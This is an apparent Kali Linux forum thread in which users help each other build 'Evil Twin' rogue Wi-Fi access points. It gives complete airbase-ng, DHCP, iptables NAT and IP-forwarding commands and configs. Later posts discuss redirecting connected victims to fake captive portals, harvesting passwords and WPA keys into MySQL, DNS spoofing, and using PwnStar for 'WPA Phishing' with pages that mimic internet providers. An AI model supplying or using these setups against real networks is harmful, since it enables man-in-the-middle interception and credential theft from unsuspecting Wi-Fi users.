Senior Member
Hey guys. I've been looking into the Evil Twin method but haven't been able to get the DHCP3 server running. I can, however get the fake AP running and a mySQL database + server running but I need help with running the DCHP3 server. Can anyone provide instructions? (along with ip flushing and forwarding, etc). Thanks!
Member
When I've done it, this is how:
Commands
/etc/dhcpd3/dhcpd.confCode:airmon-ng start wlan0 airbase-ng -e "Evil Wi-Fu" -c 11 mon0 ifconfig at0 10.0.0.254 netmask 255.255.255.0 ifconfig at0 up ifconfig eth0 up && dhclient3 eth0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 ./iptables-flush.sh iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 echo 1 > /proc/sys/net/ipv4/ip_forward
iptables-flush.shCode:dens-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; }
Code:#!/bin/bash iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT
Senior Member
Ok. Are you using isc dhcp server?Originally Posted by rastamouse
Junior Member
How to make an Evil Twin AP in Kali.
I use the same system as debian kali and have a problem with dhcp3-server (installed version isc-dhcp-server), need help about dhcpd.conf and codes please..
Junior Member
When I try to run this i get these errors: (copied directly from terminal)
root@kali:~# ifconfig at0 10.0.0.254 netmask 255.255.255.0
root@kali:~# ifconfig at0 up
root@kali:~# ifconfig eth0 up && dhclient3 eth0
bash: dhclient3: command not foundroot@kali:~# ifconfig at0 10.0.0.254 netmask 255.255.255.0
root@kali:~# ifconfig at0 up
root@kali:~# ifconfig eth0 up && dhclient3 eth0
bash: dhclient3: command not found
root@kali:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
root@kali:~# ./iptables-flush.sh
bash: ./iptables-flush.sh: No such file or directory
root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
root@kali:~# dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
bash: dhcpd3: command not found
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
root@kali:~# ./iptables-flush.sh
bash: ./iptables-flush.sh: No such file or directory
root@kali:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
root@kali:~# dhcpd3 -d -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
bash: dhcpd3: command not found
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
I am running kali live off of a usb. Why am I geting the "bash" responses?
Senior Member
Because those are not commands, you have to edit a dhcp file in the system.
Junior Member
Here is a detailed Tutorial on how you can efficiently implement Man in the middle attack using Evil Twins.
Member
The proper dhcp server for Kali is isc-dhcp-server
If you want a quick and easy way, you can install easy-creds.
Senior Member
hi :-)
if this possibly can be of help to someone:
i made a proofs on my kali-1.07(vm):
http://vimeo.com/101170619
http://vimeo.com/101133726
sorry for quality && errors!
bye
Last edited by zimmaro; 2014-07-19 at 20:12.
Senior Member
A lightwave alternative to isc-dhcp-server is udhcpd
enable it:Code:apt-get install udhcpd
create a config file:Code:sed 's%DHCPD_ENABLED="no"%DHCPD_ENABLED="yes"%g' /etc/default/udhcpd > /etc/default/udhcpd1 && mv /etc/default/udhcpd1 /etc/default/udhcpd
and start it:Code:cat > /etc/udhcpd.conf << EOF start 192.168.60.130 end 192.168.60.140 interface ""put here your interface to listen to, without quotas" lease_file /var/lib/misc/udhcpd.leases pidfile /var/run/udhcpd.pid option subnet 255.255.255.128 opt router 192.168.60.129 opt broadcast 192.168.60.255 option dns "put here your DNS server(s) without quotas and commas" option domain local option lease 864000 } EOF
Code:/etc/init.d/udhcpd start
Security always begins with personal responsibility. - quietman7
Member
hello, i'm trying to create an evil twin ap both via command line and via scripts (pwnstar a.e.). both ways work, but i always have 2 problems:
1- redirect to the fake portal page happens only on short-named sites: www.google.com , www.facebook.com and so on. longer names or subpages simply give a timeout error or a page unavailable error
2- using a android/ios device i have no notification of the data required to access internet (i'm using a captive portal page that requires a username and pass) so using a smartphone simply i connect to the ap and have no access to internet. the fake page is displayed only if i use the phone browser and access the sites i said in point 1. connecting to a normal hotspot, or an AP in mcdonalds, airports and so on always prompt a popup that lead the user to the credential page....is it possible to implement something similar on a rogue ap?
could you help me? thanks in advance
Last edited by [email protected]; 2014-07-25 at 11:11.
Senior Member
We suggest you use Pwnstar 9.0. The ability of clients to call up your rogueAP web page is increased if you provide internet access when using PwnStar 9.0 Read thru the threads concerning PwnStar. The author(not our team) has within the last few months issued an update - the download link is in the threads. You can easily rewrite the web pages to meet your requirments. We use the program primarily in WPA Phishing but we have written router web pages to mimic internet service providers.
Musket Teams
Member
hello, i'm using pwnstar 9.0 by vulpi and your version too, but i have always the same issues.
Junior Member
Is it possible ? .... evil twin in offline mode ie. without internet connection ? with dns spoof
i have tryed but i think my iptable rule are incorrect.
every thing is working good but victim pc wont get redirct !
so any solution ?
Junior Member
Hello, i succesfully set up an evil twin. but im not getting any input in mysql. The Target is myself. on my laptop i get redirected to the fake ap page and i enter a password. but when i check mysql database i get Empty set (0.00 sec)
please help
Member
If you haven't got an Internet connection, where are you redirecting them to...? Just a page on your local web server? That is possible, you would just need your DNS Spoof to return your local IP for every DNS request.
OSCP
--
If it smells like a duck, walks like a duck and quacks like a duck; then it probably is a duck.
Senior Member
To: forumkali-yopmail-com
Read thru the pwnstar thread started by Vulpi. MTeams provides a step by step method to alter your Apache2 to accept https requests.
To: rastamouse
If you are not providing internet access then you would be phishing to obtain a log in password or WPA Keys. Pwnstar 9 allows this. You can rewrite the internet pages to mimic the type of page you require.
MTeams
Posting Permissions
